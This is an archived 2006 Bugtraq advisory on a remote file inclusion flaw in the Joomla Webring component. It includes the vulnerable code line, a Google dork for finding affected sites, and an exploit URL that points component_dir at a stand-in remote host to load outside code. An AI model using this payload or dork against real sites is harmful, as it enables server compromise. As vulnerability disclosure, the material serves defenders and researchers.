Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

Joomla Webring Component (component_dir) Remote File Inclusion Vulnerabilities
From: x0r0n () hotmail com
Date: 13 Aug 2006 16:43:40 -0000
####################################################
#                                                  #
#         C Y BE R - W A R R i O R   T I M         #
#                                                  #
####################################################

Joomla Webring Component (component_dir) Remote File Inclusion Vulnerabilities

####################################################

Author: xoron

####################################################

Class : Remote

####################################################

cont () ct: x0r0n[at]hotmail[dot]com

####################################################

Code: in admin.webring.docs.php, line 12

require_once ($component_dir. "mungdocs.class.php");

####################################################

Google dork: inurl:com_webring

####################################################

Exploit:
http://www.site.com/[path]/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://evil_scripts?

####################################################

Greetz: str0ke, Preddy, Ironfist, x-master, DJR, R3D4C!D

####################################################

# milw0rm.com [2006-08-13]= http://www.milw0rm.com/exploits/2177

  By Date           By Thread  

Current thread:
  • Joomla Webring Component (component_dir) Remote File Inclusion Vulnerabilities x0r0n (Aug 14)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]